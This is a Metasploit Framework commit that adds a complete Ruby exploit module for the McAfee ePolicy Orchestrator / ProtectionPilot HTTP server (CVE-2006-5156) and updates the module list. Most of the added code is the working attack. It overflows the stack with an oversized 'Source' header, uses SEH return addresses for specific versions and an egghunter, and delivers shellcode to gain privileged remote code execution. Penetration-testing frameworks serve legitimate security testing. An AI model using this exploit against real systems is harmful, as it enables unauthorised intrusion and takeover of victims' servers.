Rewrote exploit module mcafee_epolicy_source.

git-svn-id: file:///home/svn/framework3/trunk@5142 4d416f70-5f16-0410-b530-b9f4589650da

documentation/metasploit2/exploits.txt

@@ -9,7 +9,6 @@ Unfinished modules
 	hpux_ftpd_preauth_list
 	iis_source_dumper
 	lyris_attachment_mssql
-	mcafee_epolicy_source
 	phpbb_highlight
 	phpnuke_search_module
 	realvnc_41_bypass
@@ -91,6 +90,7 @@ Completed modules
 	mailenable_imap exploit/windows/imap/mailenable_status
 	mailenable_imap_w3c exploit/windows/imap/mailenable_w3c_select
 	maxdb_webdbm_get_overflow exploit/windows/http/maxdb_webdbm_get_overflow
+	mcafee_epolicy_source exploit/windows/http/mcafee_epolicy_source
 	mdaemon_imap_cram_md5 exploit/windows/imap/mdaemon_cram_md5
 	mercantec_softcart exploit/bsdi/softcart/mercantec_softcart
 	mercur_imap_select_overflow exploit/windows/imap/mercur_imap_select_overflow

modules/exploits/windows/http/mcafee_epolicy_source.rb

@@ -0,0 +1,125 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+module Msf
+
+class Exploits::Windows::Http::McAfee_ePolicy_Source < Exploit::Remote
+
+	include Exploit::Remote::Tcp
+	include Exploit::Remote::Egghunter
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'McAfee ePolicy Orchestrator / ProtectionPilot Overflow',
+			'Description'    => %q{
+				This is an exploit for the McAfee HTTP Server (NAISERV.exe).
+				McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are
+				known to be vulnerable. By sending a large 'Source' header, the stack can
+				be overwritten. This module is based on the exploit by xbxice and muts.
+				Due to size constraints, this module uses the Egghunter technique. You may
+				wish to adjust WfsDelay appropriately.
+			},
+			'Author'  =>
+			[
+				'muts <muts [at] remote-exploit.org>',
+				'xbxice[at]yahoo.com',
+				'hdm',
+				'patrick' # MSF3 rewrite, ePO v2.5.1 target
+	  		],
+	  		'Arch'		=> [ ARCH_X86 ],
+			'License'	=> MSF_LICENSE,
+			'Version'	=> '$Revision$',
+			'References'	=>
+				[
+					[ 'URL', 'http://www.milw0rm.com/exploits/2467' ],
+					[ 'URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
+					[ 'CVE', '2006-5156' ],
+					[ 'BID', '20288' ],
+					[ 'OSVDB', '29421 ' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars'  => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'ePo 2.5.1 (Service Pack 1)',		{ 'Ret' => 0x600741b5 } ], # p/p/r nahttp32.dll 2.5.1.213
+					[ 'ePo 3.5.0/ProtectionPilot 1.1.0',	{ 'Ret' => 0x601EDBDA } ], # p/p/r xmlutil.dll
+				],
+			'Privileged'     => true,
+			'DisclosureDate' => 'Jul 17 2006'))
+
+		register_options(
+			[
+				Opt::RPORT(81),
+			], self.class)
+	end
+
+	def autofilter
+                false
+        end
+
+	def check
+		connect
+
+		req = "GET /SITEINFO.INI HTTP/1.0\r\n"
+		req << "User-Agent: Mozilla/5.0\r\n"
+		sock.put(req + "\r\n\r\n")
+
+		banner = sock.get(-1,3)
+
+		if (banner =~ /Spipe\/1.0/)
+			return Exploit::CheckCode::Appears
+		end
+			return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		connect
+
+		hunter 	= generate_egghunter
+		egg 	= hunter[1]
+
+		sploit  = Rex::Text::rand_text_alphanumeric(92)
+		sploit << Rex::Arch::X86.jmp_short(6)
+		sploit << Rex::Text::rand_text_alphanumeric(2)
+		sploit << [target['Ret']].pack('V')
+		sploit << hunter[0]
+
+		content = egg + egg + payload.encoded
+
+		request = "GET /spipe/pkg HTTP/1.0\r\n"
+		request << "User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n"
+		request << "Content-Length: " + content.length.to_s + "\r\n"
+		request << "AgentGuid=" + Rex::Text::rand_text_alphanumeric(64) + "\r\n"
+		request << "Source=" + sploit + "\r\n"
+		request << "\r\n"
+		request << content
+
+		sock.put(request + "\r\n\r\n")
+
+		disconnect
+		handler
+	end
+
+	def wfs_delay
+		25
+	end
+	end
+end
+